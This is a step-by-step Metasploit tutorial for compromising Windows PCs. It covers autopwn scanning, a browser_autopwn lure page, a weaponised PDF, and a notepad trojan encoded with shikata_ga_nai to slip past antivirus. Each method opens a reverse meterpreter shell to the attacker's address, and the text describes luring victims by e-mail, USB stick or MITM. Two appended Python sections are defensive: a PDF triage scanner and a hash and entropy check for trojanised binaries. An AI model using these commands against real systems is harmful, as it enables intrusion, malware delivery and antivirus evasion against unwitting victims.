Case 1: the PC is directly reachable over the network (locally or remotely), has no antivirus and runs an unpatched OS.
1. load Metasploit console
2. activate DB for better performance
3. port-scan to find open ports, the OS and the running services
db_nmap -sV -O -p1-65535 192.168.1.2
5. find matching exploits and try them against the target to see if I can break in (on an unpatched PC without AV protection, one or more will work)
db_autopwn -PI 135 -p -e -t
7. use the remote bind_tcp meterpreter payload
sessions -i 1
...if all is OK, we can operate on the remote PC; try
Case 2: PC over NAT
The constraints imposed by NAT are:
- the attacker cannot reach the victim's PC directly by IP
- the victim must reach out to the attacker first
- the attacker needs to use a typical client-side attack scenario (e.g. browser-based exploits, or a social engineering vector such as meterpreter exploits or e-mails with an infected PDF document; or create a malicious site which exploits browser vulns and then lure the victim to it somehow, so the victim's browser gets exploited; a meterpreter payload is needed because the victim has to initiate the connection to the attacker, etc.)
2. use auxiliary/server/browser_autopwn
3. show options
4. set LHOST 192.168.0.2 (attacker's IP)
5. set URIPATH /
6. set SRVPORT 80
8. from victim's PC just visit http://192.168.0.2/
9. ctrl+c on the attacker's PC
10. sessions -l
11. sessions -i 1
14. kill 666
Case 3: the OS is patched, there is no AV, but the software on the machine is not patched
We will target a PDF. The idea is to send the victim a PDF file containing the payload. It connects back to the attacker's PC and gives him control of the victim's PC.
2. search pdf
3. use windows/fileformat/adobe_pdf_embedded_ex
4. show options
5. ls (we need an existing PDF to use as the input file)
6. set INFILENAME /root/somefile.pdf
7. set PAYLOAD windows/meterpreter/reverse_tcp
8. show options
9. set LHOST 192.168.0.2
10. exploit -> the generated PDF is written to /root/data/exploits/evil.pdf
11. cp /root/data/exploits/evil.pdf /var/www/utilities/
12. use exploit/multi/handler
13. show options
14. set PAYLOAD windows/meterpreter/reverse_tcp
15. set LHOST 192.168.0.2
17. from the Victim's PC:
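The PDF in Case 3 works because the document carries an embedded executable plus an action that runs on open. A defender triaging mail attachments can look for exactly those structural traits. The following is an added example, not code from the page or from Metasploit; the marker list, the two constructed PDFs and the risk levels are this example's own assumptions, and the "executable" inside the sample PDF is a 64-byte stand-in, not a real program.

```python
import re
import zlib

# Structural markers that an embedded-executable PDF typically carries.
# This list is an assumption of the example, not taken from any module.
SUSPICIOUS_MARKERS = {
    b"/EmbeddedFile": "embedded file stream",
    b"/Launch": "launch action (runs an external program)",
    b"/JavaScript": "JavaScript action",
    b"/OpenAction": "action executed when the document opens",
    b"/AA": "additional (automatic) actions",
}

# Matches the body of every "stream ... endstream" object.
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def scan_pdf_bytes(data: bytes) -> dict:
    """Return {marker: count} for each suspicious marker present in the raw PDF."""
    hits = {}
    for marker in SUSPICIOUS_MARKERS:
        # Negative lookahead so "/AA" does not match e.g. "/AAPL".
        n = len(re.findall(re.escape(marker) + rb"(?![A-Za-z])", data))
        if n:
            hits[marker.decode()] = n
    return hits


def streams_with_pe_header(data: bytes) -> int:
    """Count streams whose content (raw or Flate-decoded) starts with the 'MZ' PE magic."""
    count = 0
    for m in _STREAM_RE.finditer(data):
        body = m.group(1)
        candidates = [body]
        try:
            candidates.append(zlib.decompress(body))  # /FlateDecode streams
        except zlib.error:
            pass
        if any(c.startswith(b"MZ") for c in candidates):
            count += 1
    return count


def triage(data: bytes) -> dict:
    """Combine marker hits and PE-in-stream detection into a coarse risk level."""
    hits = scan_pdf_bytes(data)
    pe = streams_with_pe_header(data)
    if pe or ("/EmbeddedFile" in hits and ("/Launch" in hits or "/OpenAction" in hits)):
        level = "high"
    elif hits:
        level = "medium"
    else:
        level = "low"
    return {"level": level, "markers": hits, "pe_streams": pe}


# Constructed sample 1: a minimal, benign PDF skeleton.
CLEAN_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
])

# Constructed sample 2: same skeleton plus an embedded, Flate-compressed "executable"
# and an /OpenAction pointing at a /Launch action. The blob is a stand-in, not a real PE.
_FAKE_EXE = zlib.compress(b"MZ" + b"\x00" * 62)
EMBEDDED_EXE_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n",
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
    b"3 0 obj\n<< /Type /EmbeddedFile /Filter /FlateDecode /Length ",
    str(len(_FAKE_EXE)).encode(), b" >>\nstream\n", _FAKE_EXE, b"\nendstream\nendobj\n",
    b"4 0 obj\n<< /S /Launch /F (payload.exe) >>\nendobj\n",
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
])

if __name__ == "__main__":
    for name, pdf in (("clean", CLEAN_PDF), ("embedded-exe", EMBEDDED_EXE_PDF)):
        print(name, triage(pdf))
```

The marker scan runs on raw bytes, so object streams (PDF 1.5+) or obfuscated names (#45mbeddedFile style hex escapes) would slip past it; a production check should normalise names and walk the object tree with a real PDF parser. Even so, an /EmbeddedFile next to a /Launch or /OpenAction is rare in legitimate documents and is worth quarantining on sight.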
Case 4: Scenario-based hacking: the OS and the software are patched, no AV
Use a combination of social engineering and a custom trojan.
The trojan can be created using msfpayload and msfencode.
The idea is to get the user to download the malware that is sent to him. The malware can also be delivered to him on a USB stick.
This can be very powerful when combined with a MITM attack (DNS or LAN based).
2. msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.0.2 X > MeterpreterReverseTCP.exe
4. cp MeterpreterReverseTCP.exe /var/www/utilities/
5. use exploit/multi/handler
6. set PAYLOAD windows/meterpreter/reverse_tcp
7. set LHOST 192.168.0.2
8. from the victim's PC, access and save locally http://192.168.0.2/utilities/Meterprete
11. msfencode -h
12. msfencode -l
13. msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.0.2 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o NotepadTrojan.exe -x /root/hack/notepad.exe -k
14. cp NotepadTrojan.exe /var/www/utilities/
15. on the victim's PC: access http://192.168.0.2/utilities/, ctrl+r it, and download NotepadTrojan.exe (it should look like the regular notepad).
16. execute it
17. ps (we'll see the processes NotepadTrojan.exe and explorer.exe).
18. migrate [explorer.exe PID]
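Case 4 depends on the trojanized notepad looking like the real one to the user. It does not look like the real one to a host-integrity check: the file hash no longer matches the vendor binary, and the encoded payload stage adds data that is far more random than ordinary program code. The following is an added example, not code from the page or from Metasploit; it assumes a known-good hash baseline kept by the defender, and the two sample "binaries" are constructed byte strings, not real executables.

```python
import hashlib
import math
import random
from collections import Counter


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(chunk: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not chunk:
        return 0.0
    n = len(chunk)
    return -sum((c / n) * math.log2(c / n) for c in Counter(chunk).values())


def high_entropy_windows(data: bytes, window: int = 1024, threshold: float = 7.2) -> list:
    """Return [(offset, entropy)] for each fixed-size window at or above the threshold.

    Plain code and text sit around 4-6 bits/byte; encoded, packed or encrypted
    data sits close to 8. The threshold is this example's assumption.
    """
    found = []
    for off in range(0, len(data), window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            found.append((off, round(e, 2)))
    return found


def check_binary(name: str, data: bytes, baseline: dict) -> dict:
    """Compare a file against a known-good hash baseline and flag high-entropy regions."""
    digest = sha256_hex(data)
    findings = []
    expected = baseline.get(name)
    if expected is None:
        findings.append("no baseline for this file")
    elif digest != expected:
        findings.append("hash differs from known-good baseline")
    windows = high_entropy_windows(data)
    if windows:
        findings.append(f"{len(windows)} high-entropy window(s), first at offset {windows[0][0]}")
    return {"sha256": digest, "suspicious": bool(findings), "findings": findings}


# Constructed stand-ins (not real PE files):
#  - GOOD_NOTEPAD mimics a plain, low-entropy program image;
#  - TROJANIZED_NOTEPAD is that image with a pseudo-random 4 KiB blob appended,
#    the way an encoded payload stage adds packed data to a host binary.
_rng = random.Random(2024)
GOOD_NOTEPAD = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n" * 60
TROJANIZED_NOTEPAD = GOOD_NOTEPAD + bytes(_rng.getrandbits(8) for _ in range(4096))

# The baseline a defender would keep: file name -> hash of the vendor-shipped binary.
BASELINE = {"notepad.exe": sha256_hex(GOOD_NOTEPAD)}

if __name__ == "__main__":
    print("original  :", check_binary("notepad.exe", GOOD_NOTEPAD, BASELINE))
    print("trojanized:", check_binary("notepad.exe", TROJANIZED_NOTEPAD, BASELINE))
```

The hash comparison is the authoritative signal: a binary that has been run through msfencode with -x/-k cannot keep the original's hash or its Authenticode signature, so an allowlist (or plain signature verification) catches it regardless of how convincing the icon is. The entropy scan is a triage aid only; legitimately packed installers and embedded compressed resources also score high, so treat it as a reason to look closer, not as a verdict. The later migrate into explorer.exe in step 18 is the same story from the process side: an explorer.exe whose memory no longer matches its on-disk image is what memory-integrity tooling is built to notice.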